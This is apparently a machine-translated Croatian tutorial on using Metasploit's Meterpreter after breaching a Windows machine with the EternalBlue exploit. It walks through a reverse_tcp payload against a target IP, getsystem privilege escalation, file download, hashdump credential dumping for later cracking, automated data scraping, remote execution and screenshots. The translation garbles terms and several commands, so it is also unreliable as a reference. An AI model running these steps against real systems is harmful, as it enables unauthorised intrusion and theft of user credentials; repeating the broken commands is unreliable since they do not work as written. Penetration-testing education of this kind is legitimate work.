metasploit

Nakon eksploatacije s Meterpreterom

Nakon eksploatacije s Meterpreterom
Ovo je uvod u dodatak za nosivost Meterpreter unutar Metasploita. U ovom kratkom vodiču razgovarat ćemo o tome kako ga primijeniti za primjenu naknadne eksploatacije na sustav OS WINDOWS nakon što ste ga već probili koristeći Eternalblue exploit. Ograničit ćemo se na pristup Windows sustavu i njegovo istraživanje, a sve stvari koje ćemo učiniti usredotočit će se na pristup informacijama i vjerodajnicama korisnika.

Uvod u Meterpreter

Meterpreter je korisni teret napada u okviru Metasploit koji omogućuje počinitelju da kontrolira i kreće se računalom žrtve kroz naredbenu ljusku. Može se pokazati vrlo svestranim alatom kada je u pitanju ispitivanje penetracije.  To je alat nakon eksploatacije koji se temelji na ubrizgavanju DLL-a u memoriju, što znači da pokreće ubrizgani DLL stvaranjem novog procesa koji poziva sustav da pokrene ubrizgani DLL. Može vam omogućiti pristup nevidljivoj naredbenoj ljusci na računalu žrtve, omogućujući vam pokretanje izvršnih datoteka i profilnih mreža.

Izvorno je napisan za Metasploit 2.x i nadograđen je za Metasploit 3.

Detaljno ćemo razgovarati o upotrebi Meterpretera, ali prije toga, razgovarajmo o korisnom opterećenju općenito

Što su nosivosti?

Korisni tereti u Metasploitu su moduli, što znači da su to isječci kodova unutar Metasploita koji se izvode na udaljenom sustavu koji ciljamo. Prvo se šalje eksploatacijski modul koji instalira modul korisnog tereta na sustav. Tada korisni teret omogućuje pristup napadaču (ograničen ili punopravan, ovisi o sadržaju korisnog tereta). Da bismo dalje razradili funkcioniranje korisnog tereta, moramo razgovarati o njegovim vrstama, kojih je ukupno 3:

Samci

Ovi tereti su potpuno samostalni, što znači da mogu biti jednako osnovni kao kodovi vratara koji korisniku omogućavaju da uđe u ciljni sustav.

Stagere

Stageri su korisni tereti koji okupljaju aplikacije unutar ciljanog sustava i šalju ih napadaču. Uspostavlja vezu između žrtve i našeg lokalnog stroja.

Faze

Nakon što upravitelji dobiju pristup sustavu, preuzimaju module faza. Moduli stupnjeva uklanjaju poklopac veličine na mjeraču.

Primjeri faza bili bi jednostavna ljuska, iPhone 'ipwn' ljuska, Meterpreter moduli, VNC Injection.

Možete izračunati vrstu korisnog tereta utvrđivanjem njegovog naziva. Pojedinačni tereti obično su oblika /

Iskorištavanje s Meterpreterom

Prije svega, pokrenite msf konzolu upisivanjem sljedeće naredbe terminala u prozor terminala Kali.

$ sudo msfconsole

Koristimo reverse_tcp kao stager, a Meterpreter kao pozornicu.

Počet ćemo postavljanjem vječnog plavog iskorištavanja. Odaberite (ms17_010_eternalblue), a zatim postavite windows / x64 / meterpreter / reverse_tcp kao odabranu nosivost

Zatim konfigurirajte postavke exploita, a zatim pokrenite exploit naredbom exploit:

$ set nosivosti windows / x64 / meterpreter / reverse_tcp
$ set rhost 192.168.198.136
$ iskorištavanje

The Eternalblue exploit je uspješno aktiviran.

Post eksploatacija

Pristupamo i manipuliramo već ugroženim sustavom tijekom post-eksploatacije.

Sad kad imamo pristup sustavu možemo učiniti puno stvari, ali kao što je gore spomenuto, ovdje ćemo ostati fokusirani uglavnom na preuzimanje podataka i dobivanje korisničkih vjerodajnica ovdje

Upravljanje privilegijom pristupa:

Ovisno o modulu korisnog tereta i eksploataciji koju ste koristili, možda ćete se suočiti s određenim ograničenjima pristupa koja će ozbiljno oslabiti vaše sposobnosti za manevriranje žrtvinim strojem. Ovaj problem možete zaobići s eskalacijom privilegija brisanjem lozinki i petljanjem u registre. Također možete eskalirati privilegije koristeći Meterpreterov nalog get system -manda.

$ dobiva sustav
$ getuid

Prijenos datoteka s Meterpreterom

Pomoću Meterpretera možete preuzeti datoteku pomoću naredbe $ download-.

$ download / windows / system32 / drivers / etc / hosts

Slično tome, podatke možete prenijeti i na stroj pomoću naredbe $ upload-

Izdvajanje korisničkih vjerodajnica:

Upotrijebite skriptu koda credential_collector za izdvajanje podataka o korisničkim računima ili upotrijebite modul raspršivanja hash s sličnim učinkom.

Upotrijebit ćemo modul hash dump deponija da bismo nastavili sakupljanjem vjerodajnica. Upišite sljedeću msf naredbu.

$ pokrenite post / windows / collect / hashdump

Kao što vidimo, dobili smo Coen, guest i admin račune. LM hash (administratorski) i NTLM (gostujući) hash se odnose na prazne lozinke, dok je Coen hash lozinka koju ćete trebati razbiti. To možete učiniti pomoću programa za razbijanje lozinki.

Automatiziranje struganja sustava

Može biti zamorno prikupljati informacije s pojedinačnim ulaznim izjavama koje morate nastaviti hraniti naredbenu ljusku. Prikladno, ovaj postupak možete donekle automatizirati pomoću vinske skripte. Skripta prikuplja podatke od žrtve i preuzima podatke na naš lokalni stroj. Reći će vam gdje se izlaz sprema, kao što možete vidjeti u četvrtom retku odozgo:

$ run wineum

Imajte na umu da se put na kojem se pohranjuje izlaz za svaku naredbu može razlikovati od prikazanog ovdje.

Hajde da se još malo zezamo

Izvršavanje datoteka

Možete pokrenuti bilo koju datoteku na sustavu pomoću: execute -f . To uključuje izvršne datoteke i programe s više podržanih datoteka. Na primjer, za pokretanje ugrađene aplikacije kalkulator u sustavu Windows OS, upišite execute -f calc.exe

Snimanje zaslona

Snimke zaslona možete snimati i s gledišta korisnika. Samo upišite snimku zaslona u naredbenu ljusku Meterpretera i dobit ćete snimku zaslona zaslona u sustavu.

$ izvrši -f kalc.exe
$ screenshot

Zaključak:

Ovo je kratki uvod u dodatak Meterpreter u okviru Metasploit, zajedno s kratkim vodičem koji prikazuje njegovu najosnovniju upotrebu. Ovdje smo naučili kako možemo probiti sustav Windows OS-a s Eternalblue exploit-om da bismo stekli pristup, a zatim upotrijebiti Meterpreter za eskalaciju privilegija, ručno prikupljanje podataka i automatizacijom vineus-naredbe. Također smo naučili kako izvršavati datoteke na računalu žrtve.

Meterpreter može poslužiti kao značajno sredstvo za otkrivanje ranjivosti, unatoč tome što je konglomerat osnovnih alata u okviru Metasploita.

Kako promijeniti pokazivač miša i veličinu, boju i shemu pokazivača na sustavu Windows 10
Pokazivač i pokazivač miša u sustavu Windows 10 vrlo su važni aspekti operativnog sustava. To se može reći i za druge operativne sustave, tako da u is...
Besplatni i otvoreni kodni pokretački programi za razvoj Linux igara
Ovaj će članak pokriti popis besplatnih i open source pokretačkih igara koje se mogu koristiti za razvoj 2D i 3D igara na Linuxu. Brojni su takvi moto...
Vodič za Shadow of the Tomb Raider za Linux
Shadow of the Tomb Raider dvanaesti je dodatak seriji Tomb Raider - franšizi u akcijsko-avanturističkoj igri koju je stvorio Eidos Montreal. I kritiča...